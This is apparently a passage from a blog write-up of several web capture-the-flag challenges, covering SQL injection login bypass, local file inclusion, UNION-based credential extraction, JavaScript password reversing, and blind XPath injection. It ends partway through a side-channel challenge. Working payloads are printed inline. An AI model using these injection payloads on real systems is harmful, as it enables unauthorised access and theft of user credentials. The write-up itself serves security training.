It didn't take much time for me to figure out that the inputs (sent via POST method) were being filtered, restricting them to only alpha-numeric characters and spaces. At this point, it started to become interesting. After testing cookies and headers for possible SQL injection bugs, I stopped thinking like a pentester and thought like a programmer. After brain-storming for about 10 minutes, it occurred to me what if the programmer has made a mistake while filtering the input? With the hypothesis in mind that the programmer might be applying filter on only $_POST requests and using $_REQUEST in the query, I took the POST parameters and send them as GET parameters with an apostrophe and voila, an error appears on the page.</div>
<blockquote class="tr_bq">
<div class="separator" style="clear: both; text-align: left;">
<span style="color: #b45f06;"><i>Error: You have an error in your SQL syntax; check the manual that
corresponds to your MySQL server version for the right syntax to use
near 'g00n' LIMIT 0,1' at line 5</i></span></div>
</blockquote>
First I thought of extracting the admin username and password from the database; but I figured that was unnecessary if the authentication page could be bypassed with good old "<b>x' or 'x'='x</b>".<br />
<blockquote class="tr_bq">
<span style="color: blue;">/login.php?username=x' or 'x'='x&password=x' or 'x'='x</span></blockquote>
<br />
<div class="separator" style="clear: both; text-align: left;">
So upon sending GET request to login.php with the injection payload, a message was appeared on the page which said "<b>Correct loginCiro</b>". And the SESSID cookie was set in the browser.</div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
Then I opened the main page which redirected to another page named private.php and that page had an image slider on it with five images.</div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
The MD5 checksums of four out of the total five images were the flags for this challenge.</div>
<h4>
5. Supposedly Analytical Test (bypassed via automation)</h4>
<br />
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgtWo9U30EvwOf84JJI8Tlgk3DrisP4Rd-GO3I68ulICprvndF1LlaW2ZUd7tIFR7rc9JrYYU4XUxZJxH446o617TX_7TkemePcrQNWekgDAJZG-MVbYVAj7m1v5JEkaVjQbTQjBQOZVfE/s1600/Screenshot_11.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgtWo9U30EvwOf84JJI8Tlgk3DrisP4Rd-GO3I68ulICprvndF1LlaW2ZUd7tIFR7rc9JrYYU4XUxZJxH446o617TX_7TkemePcrQNWekgDAJZG-MVbYVAj7m1v5JEkaVjQbTQjBQOZVfE/s1600/Screenshot_11.png" /></a></div>
<div class="separator" style="clear: both; text-align: left;">
Okay, this was one weird challenge, lol. It was supposed to break my brains which it failed to achieve. Let me explain how.</div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
On the challenge page, it could be seen that we had to choose a minimum or maximum number (randomly displayed on page) from a list of numbers which is also displayed on the page. Initial score was zero. </div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgmb-SUcpTfwffVKpO0znUX8j7i-dmyPoCD3WCr84IkJSi6skGw-6ME78bn-jiZeqsgNmA0lQRJ4FQWE_8F5wIRm230eFEULj1y87yL_OV5Qaf1fo69W7vTWTrAS1vCTIbJm2kAJIooebM/s1600/Screenshot_13.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgmb-SUcpTfwffVKpO0znUX8j7i-dmyPoCD3WCr84IkJSi6skGw-6ME78bn-jiZeqsgNmA0lQRJ4FQWE_8F5wIRm230eFEULj1y87yL_OV5Qaf1fo69W7vTWTrAS1vCTIbJm2kAJIooebM/s1600/Screenshot_13.png" /></a></div>
<div class="separator" style="clear: both; text-align: left;">
The session expires after 120 seconds which makes the score reset to zero. One wrong answer and the score becomes zero. Choosing a minimum or maximum between two numbers? Should be easy, huh?</div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
But wait, number of numbers increase as the score increases which means when score becomes one, there are three numbers to choose from and when the score becomes two, four numbers are displayed to choose from. Still seems doable, right? Okay, let's mix the negative and positive numbers and then let the game begin.</div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
When score reaches 10, there are 13 numbers both positive and negative and we had to choose a minimum or maximum from them. And still we did not how much score was required to win the game, so an ideal solution was automation.</div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
I coded a PHP script to auto determine and submit the answers and stop when the key is found.</div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
Here is the code of that PHP script:</div>
<blockquote class="tr_bq">
<div class="separator" style="clear: both; text-align: left;">
<span style="color: blue;">http://pastebin.com/raw.php?i=WfWv4zKf</span></div>
</blockquote>
The result that this script generated can be seen in the screenshot below.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj4cfoG4D6zgSumtCnBAs0n7Nv4D2MzyoFWdJyvjqjPEfdzKDNwBXTTmUPusPJvXyVNSO2zKtl5gQ_2VkCPG2rjosLC5l8RJjifCsfe0q2P6d_9tqBaxA8rHu5VN4P_Ri70WbeZgnZTN94/s1600/Screenshot_14.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj4cfoG4D6zgSumtCnBAs0n7Nv4D2MzyoFWdJyvjqjPEfdzKDNwBXTTmUPusPJvXyVNSO2zKtl5gQ_2VkCPG2rjosLC5l8RJjifCsfe0q2P6d_9tqBaxA8rHu5VN4P_Ri70WbeZgnZTN94/s1600/Screenshot_14.png" /></a></div>
<br />
It turned out that the key is displayed when the score becomes more than 50.<br />
<br />
The MD5 hash of that key was the flag for this challenge.<br />
<br />
<br />
<b>4. Reversing JavaScript Code</b><br />
<br />
<div class="separator" style="clear: both; text-align: left;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhQ-IrkFX4JU8tdD21m5OtTd4c0N-QVz2wjxfWZXKeVDvXD43rCqkx9rCV9F5LDkKVJDQRiq3q04gbPEiTVsmBBi4WZxVEXACwyo7zKwd0mHYzRtBCyb9QjgFhMtcPYeycb9dXVrMTVPPI/s1600/Screenshot_15.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhQ-IrkFX4JU8tdD21m5OtTd4c0N-QVz2wjxfWZXKeVDvXD43rCqkx9rCV9F5LDkKVJDQRiq3q04gbPEiTVsmBBi4WZxVEXACwyo7zKwd0mHYzRtBCyb9QjgFhMtcPYeycb9dXVrMTVPPI/s1600/Screenshot_15.png" /> </a></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
This challenge was interesting. It was like a riddle with a little twist.</div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
A hint was provided in the description of the flag which said:</div>
<div class="separator" style="clear: both; text-align: left;">
</div>
<blockquote class="tr_bq">
<div class="separator" style="clear: both; text-align: left;">
<span style="color: #b45f06;">This challenge has more than 150 solutions, but are you able to find the one that starts with <b>«#</b>? If yes, give me the MD5 of that value!</span></div>
</blockquote>
<div class="separator" style="clear: both; text-align: left;">
The main page (main.html) of this challenge had a sing-in form. Upon submitting the form, a JavaScript function (namely "ReverseCheck") was called which checked whether the entered password was correct or not. Username was predefined as "admin" in the same function.</div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhUj7jUGTFjOpBHSeL1dpNxGWKYzWkQ3jyPxR704ilowdgbQ8zIYm_CpqVICe193fP1T2ULb5JQ7a-YT4-cL5n0SH-pZlHWOdTIN5lzNViUQEOnEADxL4fOr88g6n2gI217MsREOO88Wis/s1600/Screenshot_16.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhUj7jUGTFjOpBHSeL1dpNxGWKYzWkQ3jyPxR704ilowdgbQ8zIYm_CpqVICe193fP1T2ULb5JQ7a-YT4-cL5n0SH-pZlHWOdTIN5lzNViUQEOnEADxL4fOr88g6n2gI217MsREOO88Wis/s1600/Screenshot_16.png" /> </a> </div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
Here is the JavaScript code which existed in the same page.</div>
<blockquote class="tr_bq">
<div class="separator" style="clear: both; text-align: left;">
<span style="color: blue;">http://pastebin.com/raw.php?i=7kC5cvjh </span></div>
</blockquote>
From this line, it was understood that the username was "admin.<br />
<blockquote class="tr_bq">
<div class="de1">
<span style="color: red;"> if(document.getElementById("utb").value=="admin")</span></div>
</blockquote>
The next line in the JS code told that the password length should be 7.<br />
<blockquote class="tr_bq">
<span style="color: red;">if(document.getElementById("ptb").value.length!=7)</span></blockquote>
Now comes the interesting part. It can be seen in the JS code that an "if" statement is used to verify the entered password which has six conditions combined with logical AND (&&) operator. So I analyzed the first condition this way.<br />
<blockquote class="tr_bq">
<span style="color: red;">document.getElementById("ptb").value.charCodeAt(0) + document.getElementById("ptb").value.charCodeAt(1)==206</span></blockquote>
It's worth mentioned here that the JavaScript "charCodeAt" function returns the Unicode value of the character at the specified index in a string.<br />
<br />
This code tells that the sum of the Unicode values of the first and second characters of our password should be equal to 206. Let's have a look at the second condition.<br />
<blockquote class="tr_bq">
<span style="color: red;">document.getElementById("ptb").value.charCodeAt(1) + document.getElementById("ptb").value.charCodeAt(2) == 201</span></blockquote>
This condition says that the Unicode values of the first and second characters of our password should be equal to 201. <br />
<br />
Rest of the four conditions follow the same pattern. The password could be easily calculated via simple plus, minus. But we had to calculate the password that started with «# as first two characters of the password.<br />
<br />
So,<br />
<br />
the Unicode of « is 171<br />
the Unicode of # is 35<br />
<br />
171 + 35 = 206<br />
<br />
Following this pattern, let's try to find out the third character using the second condition which says that the Unicode values of the first and second characters of our password should be equal to 201.<br />
<br />
We know the second character, don't we? The Unicode of second character is 35.<br />
<br />
So,<br />
<br />
201 - 35 = 166<br />
<br />
This tells us that the character at the Unicode 166 in the third character of required password which is "|".<br />
<br />
So far the first three characters of our password are « # and |<br />
<br />
Following this pattern, we could manually calculate the password but some of the characters were unprintable so it was better to calculate using small code.<br />
<br />
<div style="text-align: left;">
So after calculations, I got the following Unicode values of the password: </div>
<blockquote class="tr_bq">
<ol style="text-align: left;">
<li><span style="color: #b45f06;">171 </span></li>
<li><span style="color: #b45f06;">35 </span></li>
<li><span style="color: #b45f06;">166 </span></li>
<li><span style="color: #b45f06;">18 </span></li>
<li><span style="color: #b45f06;">159 </span></li>
<li><span style="color: #b45f06;">21 </span></li>
<li><span style="color: #b45f06;">177</span></li>
</ol>
</blockquote>
So I just used the JavaScript "fromCharCode" function which converts Unicode values into characters to calculate the password and then its MD5 hash.<br />
<br />
Here is the little piece of JS code I wrote: <br />
<blockquote class="tr_bq">
<span style="color: blue;">http://pastebin.com/raw.php?i=FU1wsPXw </span></blockquote>
Here is the output:<br />
<blockquote class="tr_bq">
<span style="color: red;">0d6162bd63d6802283fa0c16514dc271</span></blockquote>
So this MD5 hash was the flag for this challenge. <br />
<br />
<div style="text-align: left;">
</div>
<h4>
3. Multi-level (LFI, SQLi, Decoding, etc)</h4>
<br />
<br />
<div class="separator" style="clear: both; text-align: left;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgnYAVAX32n0dtLn7SYfHLI4nyXeqYe_ACbsWmwMs9zfBtT2zQ1kqUuo8oThpg9HHofXMGdHc5cq4RQgE02wsjS6Cj4eQMR_lQDnNojDkY0TrBWNFgwAvF9JUev9pg9BERHwfSx_fHNczI/s1600/Screenshot_17.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgnYAVAX32n0dtLn7SYfHLI4nyXeqYe_ACbsWmwMs9zfBtT2zQ1kqUuo8oThpg9HHofXMGdHc5cq4RQgE02wsjS6Cj4eQMR_lQDnNojDkY0TrBWNFgwAvF9JUev9pg9BERHwfSx_fHNczI/s1600/Screenshot_17.png" /></a></div>
<br />
This challenge was fun to solve. Specially the last stage where the password hash needs to be decoded into plain-text. I will be very precise about explaining it because it's kind of lengthy.<br />
<br />
It had different stages and a flag was provided at each stage.<br />
<br />
<h4 style="text-align: left;">
Stage #1:<br /> </h4>
At first stage, I had to perform simple LFI. The application was designed in such a way that the name of child pages were mentioned in the URL and those pages were included into the parent page at run-time.<br />
<br />
Here is the URL that I noticed at first:<br />
<blockquote class="tr_bq">
<span style="color: blue;">/about.php?a=industrialization</span></blockquote>
After some attempts, I discovered that a config file (config.php) existed in a directory named "config" which was located in the parent directory of current location. So I simply used the following URL to read the contents of config file:<br />
<br />
<blockquote class="tr_bq">
<span style="color: red;">/about.php?a=../config/config.php</span></blockquote>
The output said: "Ops, where is the salt?! Yes it is here...."<br />
<br />
A salt was actually mentioned in an HTML comment which could be seen by viewing the source code of the page.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhy_4xLACHAh4w-JO3gx7N1WNW5KLKc2TG4zFvKRGMBNi-7Iw2cSye-7nYhXlNzTbgBcIcKGM4BjzUjFfC6vDC7StS3dVxDvSVVpCQ3bIcD83g10jNZwICJB4Mj6YRujnqnrKUyFaKZC9Q/s1600/Screenshot_18.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhy_4xLACHAh4w-JO3gx7N1WNW5KLKc2TG4zFvKRGMBNi-7Iw2cSye-7nYhXlNzTbgBcIcKGM4BjzUjFfC6vDC7StS3dVxDvSVVpCQ3bIcD83g10jNZwICJB4Mj6YRujnqnrKUyFaKZC9Q/s1600/Screenshot_18.png" /> </a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
The MD5 hash of this salt of the flag for this stage. I had to enter this salt in a page to unlock the second stage.</div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<h4 class="separator" style="clear: both; text-align: left;">
Stage #2:</h4>
<div class="separator" style="clear: both; text-align: left;">
</div>
<div class="separator" style="clear: both; text-align: left;">
This stage was a simple SQL injection. Another page (beer.php) was unlocked after entering the salt which was discovered in first stage and that page had some link. The "id" parameter of the first link was vulnerable to SQLi. </div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
On performing the SQLi (just putting a ' in the URL), another page was unlocked with the name "Kelly Green". An MD5 hash was required entered on that page. It was kind of obvious that I had to enter the password hash to the user named "Kelly Green" there. I extracted users information from the database using the below link.</div>
<blockquote class="tr_bq">
<span style="color: blue;">/beer.php?id=1' union select
1,CONCAT_WS(CHAR(32,58,32),id,name,surname,username,password),3 from
users where name="kelly" and surname="green" and 'x'='x</span></blockquote>
Here is the output:<br />
<blockquote class="tr_bq">
<span style="color: #b45f06;">22 : Kelly : Green : S0ZH8BR22J5 : UzA5T05UWTRkZnNhNzgwZnNkNmI3OGY2YmRzNmFmdDg3NmFzZDY1OGE=</span></blockquote>
So after entering this hash, the final stage was unlocked.<br />
<br />
<h4 style="text-align: left;">
Stage #3:</h4>
In second stage, we extracted the password hash of Kelly Green. So in this last stage, the hash needed to be cracked/decoded and I was required to enter the plain-text password of Kelly Green.<br />
<br />
This stage would have been fun if the hint was not provided right above the input field. The hint said: <br />
<blockquote class="tr_bq">
<span style="color: #b45f06;"><i>As you can see, the dbms is MySQL. In this dbms the comments on
tables are stored into the INFORMATION_SCHEMA db, inside the table
TABLE.</i>
</span></blockquote>
This hint made pretty obvious that the encoding or encryption algorithm was stored in the table comments. So I used the following query to extract the contents of the comment of table "users". <br />
<blockquote class="tr_bq">
<span style="color: #b45f06;">/beer.php?id=1' union select 1,table_comment,3 from information_schema.tables where table_schema=database() and table_name="users" and 'x'='x </span></blockquote>
Here is the output: <br />
<blockquote class="tr_bq">
<span style="color: #b45f06;">password = base64(base64(password) + salt) </span></blockquote>
So I had the salt which I extracted in first stage and I had the password hash which I extracted in the second stage. And I had this algorithm. It took only a few seconds to decode the hash and get its plain-text.<br />
<br />
The plain-text password (i,e. "KON568" was the third flag for this challenge. <br />
<br />
Upon submitting the password, a GIF image was displayed on the page.<br />
<br />
The MD5 checksum of that image was the final flag for this challenge.<br />
<br />
<br />
<h4>
2. Blind XPath Injection </h4>
<br />
<br />
<div class="separator" style="clear: both; text-align: left;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjzkKgZnVSkeoIfjRdR4MvrqEiAgoH8OdT7A6BbN5sl8753KzFkZn2euNczIJjL0m7ulrxxuf8tUy2FVCd4Vj-VlbvEtM-XEJKnC3TTF4tv7v6GQw30zr-MyRG3It76zu4NfYVw5CVKJXM/s1600/Screenshot_19.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjzkKgZnVSkeoIfjRdR4MvrqEiAgoH8OdT7A6BbN5sl8753KzFkZn2euNczIJjL0m7ulrxxuf8tUy2FVCd4Vj-VlbvEtM-XEJKnC3TTF4tv7v6GQw30zr-MyRG3It76zu4NfYVw5CVKJXM/s1600/Screenshot_19.png" /></a></div>
<br />
This challenge was easy but it was time-taking. Anyone familiar with blind exploitation of such injections will understand why. <br />
<br />
The goal was defined in the challenge description as follows:<br />
<blockquote class="tr_bq">
<span style="color: #b45f06;"><b>Your goal:</b> find the secret hidden among the information sent by a special customer.</span></blockquote>
This challenge had a small PHP application for a restaurant website. Two of the total three pages had nothing of a pen-tester's interest but the third page had a form for seat reservation. It has had a link to another page to check the status of a reservation by providing email and phone.<br />
<br />
First thing I did was reserve a seat for myself using that reservation form and while doing so, I tested if any parameter was vulnerable which was not the case. But at least I reserved a seat for myself in "one of the most important restaurants in the world," as described in the challenge information.<br />
<br />
Anyway after doing so, I opened the page to to check my reservation. The page had a form which looked like this:<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgvJP8I2Eyi-9U33PJPt1vGoSY8LybsHgHnX4HfaOhp_svOfMAOmVTibizX62nyv6ZPxmaUXFbq3fhO_Rw26e_mxu9Bw8sMHlHofVTkxo8BVmPI2BH27GYn1mSjFRybcWRoTEvRrz_mEM8/s1600/Screenshot_20.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgvJP8I2Eyi-9U33PJPt1vGoSY8LybsHgHnX4HfaOhp_svOfMAOmVTibizX62nyv6ZPxmaUXFbq3fhO_Rw26e_mxu9Bw8sMHlHofVTkxo8BVmPI2BH27GYn1mSjFRybcWRoTEvRrz_mEM8/s1600/Screenshot_20.png" height="219" width="577" /> </a></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
The email field in this form was vulnerable to blind XPath injection which I deducted after testing the negative and positive results by executing the form as follows:</div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<b>Positive: </b></div>
<blockquote class="tr_bq">
<div class="separator" style="clear: both; text-align: left;">
<span style="color: #b45f06;"><b>URL</b>:</span> <span style="color: blue;">/checkreservation.php</span></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="color: #b45f06;"><b>POST data:</b></span> <span style="color: red;">phone=999-9999-9999&email=t3hg00n@yahoo.com' and '1'='1 </span></div>
</blockquote>
<b>Negative: </b><br />
<blockquote class="tr_bq">
<div class="separator" style="clear: both; text-align: left;">
<span style="color: #b45f06;"><b>URL</b>:</span> <span style="color: blue;">/checkreservation.php</span></div>
<span style="color: #b45f06;"><b>POST data:</b></span> <span style="color: red;">phone=999-9999-9999&email=t3hg00n@yahoo.com' and '1'='2</span></blockquote>
Later I realized I could send the same parameters in GET request as well (not important but makes things a bit easier). Anyway, I started with exploiting it manually by using the xpath's "substring" function but soon I realized that it was going take an eternity this way. So I tried to use a python tool named "xcat". It worked but it was so slow that it took about 30 minutes to extract the information of first user in the document but the secret was not stored in the information of first user. What a disappointed that was! And it reached the 4th user, the session was expired; but the secret was not yet found. But it did help because now I knew the element names and I figured which element contained the required secret message. This was the structure of the XML document:<br />
<blockquote class="tr_bq">
<span style="color: blue;">http://pastebin.com/raw.php?i=kEQdcGF7</span></blockquote>
So I wrote a little PHP script to extract only the text of "info" element which I believed contained the secret. So first I manually discovered the length of the text in "info" element and then used the script to extract the contents. I started from second user as I already knew that the info of first user didn't have the required secret and found the secret in the info of 7th user.<br />
<br />
Here is the little script I wrote:<br />
<blockquote class="tr_bq">
<span style="color: blue;">http://pastebin.com/raw.php?i=REiFeShx</span></blockquote>
Here is the output it generated:<br />
<br />
Before I show the final output, I must admit that I had a mini heart-attack when it reached at this point after about 20 minutes.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi19i4C2PIvA7jqtW7sDc7LVOsC-1HOICjSy7PjJeeLVLuiVJZkRKGOQWl38wTXbj3yBTORvl2XYGSk3-nCTte8zwjWnfZiGjYVT81Lhwn0WiVPLwReicfZ8FtiBPDfVPeRYLVwWYE8ARQ/s1600/Screenshot_21.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi19i4C2PIvA7jqtW7sDc7LVOsC-1HOICjSy7PjJeeLVLuiVJZkRKGOQWl38wTXbj3yBTORvl2XYGSk3-nCTte8zwjWnfZiGjYVT81Lhwn0WiVPLwReicfZ8FtiBPDfVPeRYLVwWYE8ARQ/s1600/Screenshot_21.png" /> </a></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
Because I had already spent about an hour while extracting the information of users in hope to find the secret. </div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
Here is the final output:</div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgRTd2X-w7coUPPU-89r4qRHaq6tTeRxWt6CxOBo-CqF6uqd4JdeRX-Dm8q45B4lUn37xoTuNJq-vW4571LxAfvDO-4H4anevjxUnI9FyIF_i85n-kJTL8CFNNG17Pj6kUqKhntyBahIUw/s1600/Screenshot_23.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgRTd2X-w7coUPPU-89r4qRHaq6tTeRxWt6CxOBo-CqF6uqd4JdeRX-Dm8q45B4lUn37xoTuNJq-vW4571LxAfvDO-4H4anevjxUnI9FyIF_i85n-kJTL8CFNNG17Pj6kUqKhntyBahIUw/s1600/Screenshot_23.png" /></a></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
MD5 hash of this secret (Giuseppe did a great job!) was the flag for this challenge.<br />
<br />
<br />
<h4>
1. Guess the Password (Side Channeling)</h4>
<br />
<br />
<div class="separator" style="clear: both; text-align: left;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEirsb0feolvq2ZpWQ9aeBySxHfPZijpGvmtLAsAU9Jh3g3vepRIG30ZRhWqhLfADS07TyE12ROnXaz0FhEC2F3WV-tPPmXX45noi59rzdd4bSk48no1PIkn7srUnew5uKHyMbsJwoJxiIw/s1600/Screenshot_22.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEirsb0feolvq2ZpWQ9aeBySxHfPZijpGvmtLAsAU9Jh3g3vepRIG30ZRhWqhLfADS07TyE12ROnXaz0FhEC2F3WV-tPPmXX45noi59rzdd4bSk48no1PIkn7srUnew5uKHyMbsJwoJxiIw/s1600/Screenshot_22.png" /></a></div>
<br />
<br />
<br />
This challenge was misleading. The title was misleading plus it had only 100 points, so I thought how difficult could it be? Should be easy, so I tried to solve this at second number (after finishing the 50 points challenge) but gave up after spending about 30 minutes on it and moved to the next challenge (didn't want to waste time and solve as many challenges as possible in less time).<br />
<br />
After solving all other challenges, I came back to this. The main page had a form with one input field which can be seen in the screenshot below:<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh1c5DO9o_iXbXy3CDrHkSHjvACNuijVY2vc4O-47nsDdXABQDRkHsdRLP79nfQvHJcCLyZvdorwJ9CnVaA0o7bZCGDE9jzNk0tVIO6VK28Z7y0QKoxTqF4KuFx3pKvDjENk3itNtPptMs/s1600/Screenshot_24.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh1c5DO9o_iXbXy3CDrHkSHjvACNuijVY2vc4O-47nsDdXABQDRkHsdRLP79nfQvHJcCLyZvdorwJ9CnVaA0o7bZCGDE9jzNk0tVIO6VK28Z7y0QKoxTqF4KuFx3pKvDjENk3itNtPptMs/s1600/Screenshot_24.png" height="184" width="320" /></a></div>
<br />
<br />
I started with analyzing headers, cookies and HTML source expecting the password to be hidden somewhere but at first attempt, I couldn't find anything of interest. Then I thought maybe it's a simple brute-force challenge; maybe a common weak password is used. Having this thought in mind, I coded a little script and started brute-forcing using a list of most common 1000 passwords. Result? Disappointed.<br />
<br />
Here is how the form request was submitted:<br />
<blockquote class="tr_bq">
<span style="color: #b45f06;"><b>URL:</b></span> <span style="color: blue;">/index.php</span><br />
<span style="color: #b45f06;"><b>POST data:</b></span> <span style="color: red;">password=test</span></blockquote>
And here is the resulting page:<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEivFT7UolveqiUL1vfSTaMNhS6TcnkSZij_fDWBPmrPVRKyYiWHxYpiBnt6dmlb36coF4B8TB7sXt6cblQrbFg9gwYTUUj34ORPvCfym8Yq2DVsspyP66nrm4n6oSdi2C1tehnLym2EdV4/s1600/Screenshot_26.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEivFT7UolveqiUL1vfSTaMNhS6TcnkSZij_fDWBPmrPVRKyYiWHxYpiBnt6dmlb36coF4B8TB7sXt6cblQrbFg9gwYTUUj34ORPvCfym8Yq2DVsspyP66nrm4n6oSdi2C1tehnLym2EdV4/s1600/Screenshot_26.png" /></a></div>
I am not afraid or ashamed to admit that I had never heard of "side channeling" attacks before and I had never used one and that's the reason that even after spending 2 hours on this challenge, I could not figure it out. I must admit that I was annoyed.<br />
<br />
Anyway, I checked the HTML source once again and found this interest comment there.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgRzKd69xctGXRqmzC5ayLqpXIEQr4N0clpDYF2DjP_XXO6B4tR837WYDAcmOzV6AVdajljNHsiTplT2JByPNpYAxkTyQXcPYAq511TDkDd7xNwQIWaFg9YU4tnTkCgckB2WvbebmS-XYU/s1600/Screenshot_25.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgRzKd69xctGXRqmzC5ayLqpXIEQr4N0clpDYF2DjP_XXO6B4tR837WYDAcmOzV6AVdajljNHsiTplT2JByPNpYAxkTyQXcPYAq511TDkDd7xNwQIWaFg9YU4tnTkCgckB2WvbebmS-XYU/s1600/Screenshot_25.png" /></a></div>
"?debug for DEBUGGING" - I started wondering what it could possibly mean. I included "debug" parameter in the URL and analyzed the source but it was the same with and without the parameter.<br />
<br />
After trying many things using this hint, I tampered the password submitting request and sent the request as below:<br />
<blockquote class="tr_bq">
<span style="color: #b45f06;"><b>URL:</b></span> <span style="color: blue;">/index.php?debug</span><br />
<span style="color: #b45f06;"><b>POST data:</b></span> <span style="color: red;">password=test</span></blockquote>
At first the result looked exactly the same. But after checking the source, I discovered that that was some addition content in the result; it was an HTML comment which can be seen in the screenshot below.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjsdQzNbmW9iw95N8D9EgRHLenDYE0nQ99AkFGzMY6lgA8t_XtAZCBKupyFJRAlgbCIgbAZQlNvhCeEH6ToswYILh2tQkSjRN_vWXgMt1wE8RfMAJdUPIOsa6OGucOkbM8kui53yYdxlt0/s1600/Screenshot_29.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjsdQzNbmW9iw95N8D9EgRHLenDYE0nQ99AkFGzMY6lgA8t_XtAZCBKupyFJRAlgbCIgbAZQlNvhCeEH6ToswYILh2tQkSjRN_vWXgMt1wE8RfMAJdUPIOsa6OGucOkbM8kui53yYdxlt0/s1600/Screenshot_29.png" /></a></div>
